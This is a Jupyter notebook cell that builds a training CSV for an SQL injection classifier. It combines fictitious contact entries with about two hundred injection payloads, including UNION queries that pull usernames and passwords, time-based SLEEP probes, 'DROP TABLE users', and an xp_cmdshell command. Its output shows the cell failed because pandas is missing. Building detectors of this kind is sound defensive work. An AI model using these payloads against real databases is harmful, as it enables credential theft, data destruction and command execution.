In [8]:
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import classification_report
import joblib
from flask import Flask, request, jsonify

# Sample data
normal_entries = [
    "John Doe",
    "123 Main Street, New York, NY",
    "johndoe@example.com",
    "9876543210",
    "Jane Smith",
    "456 Elm Street, Los Angeles, CA",
    "janesmith@example.com",
    "8765432109",
    "Michael Johnson",
    "789 Oak Street, Chicago, IL",
    "michaelj@example.com",
    "7654321098",
    "Emily Brown",
    "321 Pine Street, Houston, TX",
    "emilyb@example.com",
    "6543210987",
    "David Wilson",
    "654 Maple Avenue, Miami, FL",
    "davidw@example.com",
    "5432109876",
    "Sarah Miller",
    "987 Birch Road, Seattle, WA",
    "sarahm@example.com",
    "4321098765",
    "Robert White",
    "159 Cedar Lane, Denver, CO",
    "robertw@example.com",
    "3210987654",
    "Linda Davis",
    "753 Spruce Boulevard, Boston, MA",
    "lindad@example.com",
    "2109876543",
    "William Martinez",
    "951 Redwood Drive, San Francisco, CA",
    "williamm@example.com",
    "1098765432",
    "Olivia Anderson",
    "852 Magnolia Court, Phoenix, AZ",
    "oliviaa@example.com",
    "0987654321",
    
    "Ethan Taylor",
    "123 Sunset Blvd, Los Angeles, CA",
    "ethant@example.com",
    "9123456780",
    "Sophia Moore",
    "456 Mountain View Dr, Denver, CO",
    "sophiam@example.com",
    "9234567891",
    "James Anderson",
    "789 Ocean Ave, Miami, FL",
    "jamesa@example.com",
    "9345678902",
    "Ava Thompson",
    "321 Greenway St, Seattle, WA",
    "avat@example.com",
    "9456789013",
    "Mason Hall",
    "654 Broadway Rd, Boston, MA",
    "masonh@example.com",
    "9567890124",
    "Isabella Scott",
    "987 Lakeshore Dr, Austin, TX",
    "isabellas@example.com",
    "9678901235",
    "Benjamin Young",
    "159 Riverbend Ln, Chicago, IL",
    "benjaminy@example.com",
    "9789012346",
    "Mia Carter",
    "753 Willow St, San Diego, CA",
    "miac@example.com",
    "9890123457",
    "Daniel Turner",
    "951 Redwood Ave, Phoenix, AZ",
    "danielt@example.com",
    "9001234568",
    "Charlotte Hill",
    "852 Magnolia Blvd, New Orleans, LA",
    "charlotteh@example.com",
    "9112345679",
    "Logan Adams",
    "741 Aspen Ct, Nashville, TN",
    "logana@example.com",
    "9223456781",
    "Amelia Lewis",
    "369 Birchwood Dr, Minneapolis, MN",
    "amelial@example.com",
    "9334567892",
    "Elijah Walker",
    "258 Pinehurst Rd, San Antonio, TX",
    "elijahw@example.com",
    "9445678903",
    "Harper Nelson",
    "147 Juniper Ln, Atlanta, GA",
    "harpern@example.com",
    "9556789014",
    "Alexander King",
    "963 Maplewood Dr, Columbus, OH",
    "alexanderk@example.com",
    "9667890125",
    "Evelyn Wright",
    "741 Chestnut Ave, Sacramento, CA",
    "evelynw@example.com",
    "9778901236",
    "Matthew Baker",
    "258 Sunrise Rd, Portland, TC",
    "matthewb@example.com",
    "9889012347",
    "Abigail Green",
    "369 Hillside Ct, Charlotte, NC",
    "abigailg@example.com",
    "9990123458",
    "Henry Harris",
    "147 Oakridge Blvd, Indianapolis, IN",
    "henryh@example.com",
    "9012345670",
    "Emily Perez",
    "753 Grandview Dr, Jacksonville, FL",
    "emilyp@example.com",
    "9123456782",
    "Jackson Torres",
    "963 Cedarwood Ln, Memphis, TN",
    "jacksont@example.com",
    "9234567893",
    "Lily Brooks",
    "258 Meadowbrook Ave, Louisville, KY",
    "lilyb@example.com",
    "9345678904",
    "David Ramirez",
    "369 Sycamore St, Oklahoma City, OK",
    "davidr@example.com",
    "9456789015",
    "Scarlett Foster",
    "147 Walnut Dr, Kansas City, MO",
    "scarlettf@example.com",
    "9567890126",
    "Sebastian Long",
    "753 Highland Blvd, Tucson, AZ",
    "sebastianl@example.com",
    "9678901237",
    "Aria Bailey",
    "963 Redwood Ct, Omaha, NE",
    "ariab@example.com",
    "9789012348",
    "Wyatt Ross",
    "258 Elmwood Ln, Fresno, CA",
    "wyattr@example.com",
    "9890123459",
    "Penelope Rivera",
    "369 Acacia Dr, Virginia Beach, VA",
    "peneloper@example.com",
    "9001234560",
    "Luke Parker",
    "147 Sunset Blvd, Raleigh, NC",
    "lukep@example.com",
    "9112345671",
    "Zoe Mitchell",
    "753 Bayview Rd, Miami, FL",
    "zoem@example.com",
    "9223456782",
    "Jayden Collins",
    "963 Morningstar Dr, Colorado Springs, CO",
    "jaydenc@example.com",
    "9334567893",
    "Hannah Stewart",
    "258 Bluebird Ln, Baltimore, MD",
    "hannahs@example.com",
    "9445678904",
    "Gabriel Edwards",
    "369 Harborview Ave, El Paso, TX",
    "gabriele@example.com",
    "9556789015",
    "Layla Morris",
    "147 Whispering Pines Ln, Washington, D.C.",
    "laylam@example.com",
    "9667890126",
    "Julian Jenkins",
    "753 Tranquil Ct, Detroit, MI",
    "julianj@example.com",
    "9778901237",
    "Nora Griffin",
    "963 Boulder Dr, Las Vegas, NV",
    "norag@example.com",
    "9889012348",
    "Christian Bennett",
    "258 Evergreen Rd, Albuquerque, NM",
    "christianb@example.com",
    "9990123459",
    "Victoria Gonzalez",
    "369 Starlight Ave, Long Beach, CA",
    "victoriag@example.com",
    "9012345671"
]

sql_injection_entries = [
    
    "' OR '1'='1' --",
    "1 UNION SELECT null, username, password FROM users --",
    "' AND SLEEP(5) --",
    "' OR 'x'='x' --",
    "'; DROP TABLE users; --",
    "' UNION ALL SELECT NULL, table_name FROM information_schema.tables --",
    "' OR '1'='1' OR '1'='1' --",
    "1 AND 1=CONVERT(int, @@version) --",
    "' OR '1'='1'",
    "1' AND (SELECT COUNT(*) FROM users) > 0 --",
    "' UNION SELECT NULL, username, password FROM users --",
    "' AND 1=1 --",
    "' UNION SELECT NULL, NULL, NULL --",
    "' AND 1=CONVERT(int, @@version) --",
    "' OR IF(1=1, sleep(5), 0) --",
    "' UNION SELECT NULL, password FROM users --",
    "' OR SLEEP(5) --",
    "' UNION SELECT NULL, table_name FROM information_schema.tables --",
    "' AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT @@version))) --",
    "1 AND IF(1=1, SLEEP(5), 0) --",
    "' UNION SELECT NULL, username, password --",
    "' OR IF(1=1, SLEEP(5), 0) --",
    "' OR '1'='1' --",
    "' AND 1=1 --",
    "1 UNION SELECT NULL, password FROM users --",
    "1' OR SLEEP(5) --",
    "' UNION ALL SELECT NULL, NULL FROM dual --",
    "' OR '1'='1'",
    "' UNION SELECT NULL, NULL FROM users --",
    "' UNION ALL SELECT NULL, username, password FROM users --",
    "' OR 1=1 --",
    "' UNION SELECT username, password FROM users --",
    "' AND 1=CONVERT(int, @@version) --",
    "' UNION SELECT NULL, table_name FROM information_schema.tables --",
    "' AND IF(1=1, SLEEP(5), 0) --",
    "1' OR '1'='1' --",
    "' UNION SELECT NULL, NULL, NULL --",
    "' AND SLEEP(10) --",
    "' OR SLEEP(5) --",
    "1' UNION SELECT NULL, username, password FROM users --",
    "' OR 'x'='x'",
    "1 AND IF(1=1, sleep(10), 0) --",
     "' AND SLEEP(5) --",
    "' OR 1=1 --",
    "' AND 1=1 --",
    "1' AND (SELECT COUNT(*) FROM information_schema.tables) > 0 --",
    "' OR 1=1 --",
    "' OR IF(1=1, SLEEP(5), 0) --",
    "' UNION SELECT NULL, username, password --",
    "' OR '1'='1'#",
    "1' OR 'a'='a' --",
    "' OR 1=1 LIMIT 1 --",
    "' UNION SELECT NULL, NULL, version() --",
    "' AND ascii(substr(database(), 1, 1)) = 100 --",
    "' OR (SELECT 1 FROM DUAL WHERE 1=1) --",
    "' AND 1=1#",
    "' OR EXISTS(SELECT * FROM users) --",
    "1; EXEC xp_cmdshell('dir') --",
    "' AND 1=LIKE(CHAR(97,98,99)) --",
    "' AND EXTRACTVALUE(1, CONCAT(CHAR(33), database())) --",
    "' AND (SELECT ASCII(SUBSTRING(@@version,1,1)))=52 --",
    "1' AND (SELECT COUNT(*) FROM information_schema.tables) > 10 --",
    "' OR SLEEP(10) --",
    "' AND ASCII(SUBSTRING((SELECT database()), 1, 1)) = 68 --",
    "' UNION SELECT NULL, NULL, table_name FROM information_schema.tables LIMIT 1 --",
    "' OR EXISTS(SELECT 1 FROM users WHERE username='admin') --",
    "' OR (SELECT 1 WHERE 1=1) --",
    "' AND (SELECT version()) LIKE '5%' --",
    "' OR 1=1 ORDER BY 1 --",
    "' OR ascii(substring((select database()),1,1)) = 109 --",
    
     "' UNION ALL SELECT NULL, NULL, @@version --",
    "' AND EXISTS(SELECT * FROM information_schema.tables WHERE table_schema=database()) --",
    "' OR (SELECT NULL) IS NULL --",
    "' OR (SELECT database()) = 'test' --",
    "' OR SLEEP(5) AND '1'='1' --",
    "' OR EXISTS(SELECT 1 FROM information_schema.tables) --",
    "' UNION ALL SELECT table_name FROM information_schema.tables --",
    "' AND ASCII(SUBSTRING((SELECT @@version), 1, 1)) = 53 --",
    "' OR EXTRACTVALUE(1, CONCAT(CHAR(33), version())) --",
    "' OR SLEEP(5) AND 'a'='a' --",
    "' AND (SELECT version()) LIKE '5.7%' --",
    "' OR EXISTS(SELECT * FROM mysql.user) --",
    "' UNION ALL SELECT NULL, NULL FROM mysql.db --",
    "' AND ascii(substring((select @@version),1,1)) = 52 --",
    "' OR SLEEP(2) --",
    "' OR EXISTS(SELECT * FROM information_schema.tables WHERE table_name = 'users') --",
    "' UNION ALL SELECT table_name, NULL FROM information_schema.tables --",
    "' AND ascii(substring((select database()),1,1)) = 116 --",
    "' OR EXISTS(SELECT 1 FROM users) --",
    "' UNION SELECT NULL, NULL, NULL FROM users --",
    "' OR (SELECT 1 FROM information_schema.tables WHERE table_schema='mysql') --",
    "' OR 1=1 AND SLEEP(3) --",
    "' UNION SELECT NULL, NULL, table_name FROM information_schema.tables WHERE table_schema=database() --",
    "' OR EXISTS(SELECT * FROM information_schema.tables WHERE table_name='users') --",
    "' OR 1=1 AND SLEEP(1) --",
    "' OR 1=1 UNION SELECT NULL, NULL, NULL --",
    "1' AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users') > 1 --",
    "' UNION ALL SELECT NULL, table_name FROM information_schema.tables WHERE table_schema = database() --",
    "' OR 1 GROUP BY column_names HAVING 1=1 --",
    "' AND ascii(substring((SELECT @@version), 2, 1)) = 53 --",
    "' OR EXISTS(SELECT 1 FROM mysql.user WHERE user = 'admin') --",
    "' UNION SELECT NULL, NULL, table_name FROM information_schema.tables WHERE table_name = 'users' --",
    "' AND (SELECT COUNT(*) FROM mysql.db) = 10 --",
    "' OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_name = 'users') > 0 --",
    "1; DROP TABLE IF EXISTS users; --",
    "' OR (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) IS NOT NULL --",
    "' AND (SELECT COUNT(*) FROM mysql.user WHERE user='admin') > 0 --",
     "' OR 1=1 UNION ALL SELECT NULL, NULL FROM mysql.db --",
    "' OR SLEEP(0.1) --",
    "' AND ascii(substr((SELECT table_name FROM information_schema.tables LIMIT 1), 1, 1)) = 117 --",
    "' UNION SELECT NULL, table_name FROM information_schema.tables WHERE table_schema=database() --",
    "' OR (SELECT NULL) IS NOT NULL --",
    "' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users') > 0 --",
    "' OR (SELECT COUNT(*) FROM mysql.user WHERE user='root') > 0 --",
    "' UNION SELECT NULL, NULL, NULL FROM mysql.db --",
    "' AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema=database()) > 0 --",
    "' AND (SELECT ascii(substring((SELECT version()),2,1))) = 53 --",
    "' OR SLEEP(2) AND '1'='1' --",
    "' UNION ALL SELECT NULL, NULL, NULL --",
    "' OR EXISTS(SELECT * FROM information_schema.tables WHERE table_schema='mysql') --",
    "1' UNION SELECT NULL, version(), NULL --",
    "' OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='mysql') > 0 --",
    "' OR 1=1 AND SLEEP(3) --",
    "' AND (SELECT COUNT(*) FROM mysql.db WHERE db='test') > 0 --",
    "' UNION ALL SELECT NULL, NULL FROM information_schema.columns WHERE table_schema='mysql' --",
    "' UNION SELECT NULL, NULL, NULL FROM users --",
    "' OR EXISTS(SELECT * FROM information_schema.columns WHERE table_schema='mysql') --",
    "' UNION ALL SELECT table_name, NULL FROM information_schema.tables WHERE table_schema='mysql' --",
    "' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='test') > 0 --",
    "' OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='test') > 0 --",
    "' UNION SELECT NULL, NULL, table_name FROM information_schema.tables WHERE table_schema='mysql' --",
    "' OR EXISTS(SELECT 1 FROM mysql.user WHERE user='test') --",
    "1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='test') > 0 --",
    "' UNION ALL SELECT table_name, NULL FROM information_schema.tables WHERE table_schema='test' --",
    "' OR 1=1 AND SLEEP(4) --",
    "' OR (SELECT NULL) IS NULL --",
    "' AND (SELECT COUNT(*) FROM mysql.db WHERE db='test') > 0 --",
    "' UNION SELECT NULL, NULL, table_name FROM information_schema.tables WHERE table_schema='mysql' --",
    "' AND (SELECT ascii(substr((SELECT table_name FROM information_schema.tables LIMIT 1), 2, 1))) = 105 --",
    "' OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema=database()) > 0 --",
    "' UNION SELECT NULL, version(), table_name FROM information_schema.tables WHERE table_schema=database() --",
    "' OR EXISTS(SELECT * FROM mysql.user WHERE user='root') --",
    "SELECT * FROM users WHERE name='John' OR 1=1 --",
    "1; UNION SELECT password FROM users WHERE username='admin' --",
    "' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='accounts') > 0 --",
    "' OR (SELECT NULL FROM mysql.db LIMIT 1) IS NULL --",
    "' OR EXISTS(SELECT 1 FROM dual WHERE database()='test' AND version() LIKE '5%') --",
    "SELECT * FROM products WHERE id='1' OR 'a'='a' --",
    "' UNION SELECT null, username, password FROM admin --",
    "' AND (SELECT COUNT(*) FROM mysql.user) = 5 --",
    "' AND ascii(substring((SELECT password FROM users WHERE id=1), 1, 1)) = 65 --",
    "' UNION SELECT null, version(), database() --",
    "' OR (SELECT COUNT(*) FROM accounts WHERE account_status='active') > 0 --",
    "1' UNION ALL SELECT null, user() --",
    "' OR SLEEP(5) --",
    "' OR (SELECT table_name FROM information_schema.tables LIMIT 1) IS NOT NULL --",
    "' UNION ALL SELECT null, null, null FROM mysql.db --",
    "' OR (SELECT COUNT(*) FROM accounts WHERE active='yes') > 0 --",
    "' UNION SELECT null, null, table_name FROM information_schema.tables WHERE table_schema='mysql' --",
    "' UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_name='users' --",
    "' OR EXISTS(SELECT * FROM dual WHERE 1=1) --",
    "1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='mysql') > 0 --",
    "' OR (SELECT NULL FROM mysql.user WHERE user='admin') IS NOT NULL --",
    "' UNION SELECT password FROM users WHERE id=2 --",
    "' OR EXISTS(SELECT * FROM mysql.db WHERE db='test') --",
    "' OR 1=1 AND SLEEP(10) --",
    "' UNION ALL SELECT version(), user(), database() --",
    "' UNION SELECT null, null, null, table_name FROM information_schema.tables --",
    "' OR 1=1; --",
    "SELECT * FROM accounts WHERE username='admin' AND 1=1 --",
    "1' UNION SELECT table_name FROM information_schema.tables --",
    "' UNION SELECT null, null, column_name FROM information_schema.columns WHERE table_name='users' --",
    "' OR (SELECT version()) = '5.7.29' --",
    "' UNION ALL SELECT null, null, user() --",
    "' AND (SELECT COUNT(*) FROM mysql.user WHERE user='root') = 1 --",
    "' OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='mysql') > 0 --",
    "' OR EXISTS(SELECT * FROM information_schema.columns WHERE table_name='accounts') --",
    "1' UNION ALL SELECT null, null, null FROM mysql.db --",
    "' OR EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema='mysql' AND table_name='users') --",
    "SELECT * FROM users WHERE username='admin' AND password='password' OR 1=1 --",
    "' OR SLEEP(1) --",
    "' AND (SELECT COUNT(*) FROM mysql.user) > 1 --",
    "' UNION ALL SELECT null, column_name FROM information_schema.columns WHERE table_schema='test' --",
    "1' OR (SELECT COUNT(*) FROM mysql.db WHERE db='mysql') > 0 --",
    "' AND EXISTS(SELECT * FROM mysql.user WHERE user='test' AND password='test' --",
    "' OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='test') > 0 --",
    "test); DELETE FROM users; --",
    "' OR '1'='1"


       
    
]


# Create DataFrame
df = pd.DataFrame({
    'entry': normal_entries + sql_injection_entries,
    'label': [0] * len(normal_entries) + [1] * len(sql_injection_entries)
})

# Save to CSV
df.to_csv('log_entries.csv', index=False)
print("CSV file 'log_entries.csv' created successfully.")

ModuleNotFoundError: No module named 'pandas'